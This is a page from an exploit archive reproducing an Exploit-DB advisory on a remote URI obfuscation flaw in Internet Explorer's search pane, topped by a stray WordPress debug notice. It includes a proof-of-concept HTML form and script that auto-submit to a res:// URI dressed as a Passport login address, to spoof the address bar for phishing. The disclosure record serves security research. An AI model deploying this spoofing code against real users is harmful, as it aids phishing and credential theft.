Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Remote URI Obfuscation Vulnerability in Internet Explorer - exploit.company
header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Unknown
4
CVSS
MEDIUM
Remote URI obfuscation
601
CWE
Product Name: Internet Explorer
Affected Version From: Internet Explorer (Unknown version)
Affected Version To: Internet Explorer (Unknown version)
Patch Exists: NO
Related CWE:
CPE: a:microsoft:internet_explorer
Metasploit:
Other Scripts:
Platforms Tested: Windows
Unknown

Remote URI Obfuscation Vulnerability in Internet Explorer

A remote URI obfuscation vulnerability has been found in Internet Explorer's search pane functionality. This issue is due to a failure of the application to present the URI address of HTML and script code loaded into the search pane. An attacker can exploit this vulnerability to display misleading information in the address bar of the browser, making it seem like the web page is from a trusted location. This can be used to facilitate phishing attacks and other types of attacks.

Mitigation:

There is no known mitigation for this vulnerability at the moment.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11851/info

A remote URI obfuscation vulnerability has been found in Internet Explorer's search pane functionality. This issue is due to a failure of the application to present the URI address of HTML and script code loaded into the search pane.

This issue may be leveraged by an attacker to display misleading information in the address bar of the browser to an unsuspecting user while loading a third party Web site in the search pane. This may allow an attacker to present web pages to users that seem to originate from a trusted location. This may facilitate phishing style attacks; other attacks may also be possible.

<form id="foo" action="res://C:\WINDOWS\system32\shdoclc.dll/dnserror.htm#http://login.passport.net/uilogin.srf?id=malware.is.here" method="post"><


<input type="submit" value="default value">
</form>

<a id="fee" href="hotfemail.html" target="_search">test</a>

<script>

var malware = screen.availHeight;
window.moveTo(0, 0);
window.resizeTo(500, malware);
fee.click()
// setTimeout("fee.click();",1);

setTimeout("foo.submit();",1);


</script>

Navigation

Suggest Exploit

Services By CQR